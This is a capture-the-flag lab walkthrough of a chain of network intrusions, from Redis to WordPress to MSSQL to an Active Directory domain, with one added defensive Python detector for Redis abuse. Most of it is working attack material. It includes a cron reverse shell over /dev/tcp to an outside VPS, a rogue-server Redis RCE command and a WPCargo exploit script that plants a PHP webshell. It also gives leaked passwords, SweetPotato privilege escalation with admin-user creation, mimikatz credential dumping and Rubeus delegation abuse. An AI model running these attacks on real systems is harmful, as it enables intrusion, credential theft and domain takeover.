春秋云镜-Brute4Road

flag01

Information gathering

Port 6379 is open, which is Redis, so Redis is obviously the way in.

Common Redis exploitation methods:

1. Logging into the server via ssh-keygen

Conditions:

1) The Redis service is started as root.

2) The server runs SSH and allows key-based login, so a public key can be written remotely and used to log straight into the server.

2. Reverse shell via a cron job

Conditions:

Redis started as root

Redis has no password or a weak password

3. Writing a webshell directly with Redis

Conditions:

The absolute path of the web root is known, and write permission to it is needed

Redis started as root

Redis has a weak password or none

4. Redis master/slave replication getshell

Conditions:

Redis version 4.x to 5.0.5 (the module feature added in these versions allows a malicious .so compiled from C to be loaded)

Redis has a weak password or none

Redis started as root

5. Combined with SSRF

Conditions:

Redis started as root

The target supports the dict protocol

The absolute path of the web root is known

Redis has no password or a weak password

6. Redis Lua
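As an added defender-side example (not part of the original write-up), the following Python detection parses `redis-cli MONITOR` lines and flags the command sequences behind the cron-write and master/slave methods listed above: a SAVE issued after CONFIG SET dir points at a sensitive directory, SLAVEOF/REPLICAOF to an untrusted master, and MODULE LOAD. The sample MONITOR lines, the trusted-master address and the sensitive-directory list are constructed assumptions.

```python
import os
import re
from collections import defaultdict

# Constructed sample of `redis-cli MONITOR` output (not from the original write-up):
# client 192.0.2.10 mimics the cron-write sequence, 192.0.2.11 the master/slave module path.
SAMPLE_MONITOR = """\
1724140001.000001 [0 10.0.0.5:50001] "GET" "session:abc"
1724140002.000001 [0 192.0.2.10:51234] "FLUSHALL"
1724140003.000001 [0 192.0.2.10:51234] "CONFIG" "SET" "dir" "/var/spool/cron/crontabs/"
1724140004.000001 [0 192.0.2.10:51234] "CONFIG" "SET" "dbfilename" "shell"
1724140005.000001 [0 192.0.2.10:51234] "SET" "xz" "\\n* * * * * id\\n"
1724140006.000001 [0 192.0.2.10:51234] "SAVE"
1724140007.000001 [0 192.0.2.11:40000] "SLAVEOF" "198.51.100.7" "21000"
1724140008.000001 [0 192.0.2.11:40000] "MODULE" "LOAD" "/tmp/exp.so"
"""

LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')  # quoted args, honouring backslash escapes

# Directories where an RDB dump is really an arbitrary file write (cron, SSH keys, web root).
SENSITIVE_DIRS = ("/var/spool/cron", "/etc/", "/root/.ssh", "/var/www")
TRUSTED_MASTERS = {"10.0.0.6"}  # assumption: the only legitimate replication master

def parse_monitor(text):
    """Yield (client, [command, arg, ...]) for every well-formed MONITOR line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group("client"), ARG_RE.findall(m.group("args"))

def detect(text):
    """Return alerts as (client, rule, detail) tuples, in the order they trigger."""
    alerts = []
    state = defaultdict(dict)  # per-client view of the last CONFIG SET dir / dbfilename
    for client, args in parse_monitor(text):
        cmd = args[0].upper() if args else ""
        st = state[client]
        if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            st[args[2].lower()] = args[3]
        elif cmd in ("SAVE", "BGSAVE"):
            d = st.get("dir", "")
            if d.startswith(SENSITIVE_DIRS) or "/.ssh" in d:
                path = os.path.join(d, st.get("dbfilename", "dump.rdb"))
                alerts.append((client, "rdb-write-sensitive-dir", path))
        elif cmd in ("SLAVEOF", "REPLICAOF") and len(args) >= 3 and args[1].upper() != "NO":
            if args[1] not in TRUSTED_MASTERS:
                alerts.append((client, "untrusted-replication-master", f"{args[1]}:{args[2]}"))
        elif cmd == "MODULE" and len(args) >= 3 and args[1].upper() == "LOAD":
            alerts.append((client, "module-load", args[2]))
    return alerts
```

Run `detect(SAMPLE_MONITOR)` to see the three alerts; the same function works on a live `redis-cli MONITOR` stream piped line by line.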

Testing

Try writing a reverse-shell cron task:

redis-cli -h 192.168.33.134                 # connect to redis
flushall                                    # clear all keys
config set dir /var/spool/cron/crontabs/    # set the save path
config set dbfilename shell                 # set the file name
set xz "\n* * * * * bash -i >& /dev/tcp/101.34.80.152/9999 0>&1\n"   # write the reverse shell into key xz
save                                        # write the shell file to the save path

Tested it, no permission, so try master/slave replication instead.

Here redis-rogue-server is used to get RCE:

git clone https://github.com/n0b0dyCN/redis-rogue-server.git

python3 redis-rogue-server.py --rhost 39.99.133.63 --lhost 101.34.80.152   # lhost is your VPS address

Found that base64 runs with root privileges; no need to say more, use it directly:

base64 "/home/redis/flag/flag01" | base64 --decode

flag02

Next we need a proxy, so upload frp and fscan.

First check the IP.

The usual ifconfig no longer works, so I learned a new one:

netstat -ano

chmod 777 fscan
./fscan -h 172.22.2.1/24

172.22.2.3 domain machine

172.22.2.16 domain machine

172.22.2.18 wordpress

Found a WordPress site; set up the proxy and take a look.

Scan it with the plugin scanner:

proxychains wpscan --url http://172.22.2.18

Found a relevant plugin vulnerability.

Found a script online:

import sys
import binascii
import requests

# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'

def encode_character_code(c: int):
    return '{:08b}'.format(c).replace('0', 'x')

text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

destination_url = 'http://172.22.2.18/'
cmd = 'ls'

# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)
# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
    f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))

The connection type has to be changed here.

Saw the database configuration:

wpuser

WpuserEha8Fgj9

Connect to the database with AntSword and get the flag.

flag03

Found a very interesting table. Where is this hint from?

fscan found MSSQL earlier.

The Mima column here should correspond to the passwords; remember to remove the limit when exporting, pull them down and brute-force afterwards.

sa / ElGNkOiC

Connected and activated it.

Upload my SweetPotato; remember to activate the component.

C:/Users/Public/sweetpotato.exe -a "netstat -ano"

Port 3389 is open, so connect over remote desktop:

C:/Users/Public/sweetpotato.exe -a "net user aaa Q1ngchuan@ /add"
C:/Users/Public/sweetpotato.exe -a "net localgroup administrators aaa /add"   # add to the administrators group

Set a somewhat complex password; Windows has basic password requirements.

Connect and find the flag.

flag04

Next comes domain penetration.

Information gathering

Run systeminfo and find the domain environment.

Bring in mimikatz.

Tried a DCSync command but it didn't work, so try grabbing local user credentials.

Run as administrator:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

NTLM: c6f58ffaa5ae21240ef122eb09e47c76

The MSSQLSERVER machine is configured with constrained delegation to the DC's LDAP and CIFS services.

I don't know much about constrained delegation attacks, so let's learn:

https://xz.aliyun.com/t/14417?time__1311=GqAxuWKCqDq0yqew4Yqo4fg4jxw%3DDgBeoD

Rubeus.exe download link (several I tried didn't work):

https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe

First request a TGT for the machine account MSSQLSERVER with Rubeus; after it runs you get the Base64-encoded TGT ticket.

.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:c6f58ffaa5ae21240ef122eb09e47c76 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt

.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:<base64 TGT from 1.txt>

Summary

From this box I learned a new command for viewing the subnet IP:

netstat -ano

Grabbing plaintext passwords and hashes with mimikatz:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

If an attacker can obtain the privileges of a service account configured with constrained delegation (for example by getting its password or hash, which mimikatz can do), they can impersonate any user in the domain (for example a domain administrator) and obtain access to the configured services on that user's behalf.

MSSQLSERVER is configured with constrained delegation to the DC's LDAP and CIFS services: use Rubeus to request its own service ticket, then forge an ST through S4U. Through Rubeus's S4U2Self protocol, request a ticket for the DC's LDAP service on behalf of the domain administrator and inject it into memory; the current user is then effectively impersonating the administrator and has the corresponding privileges.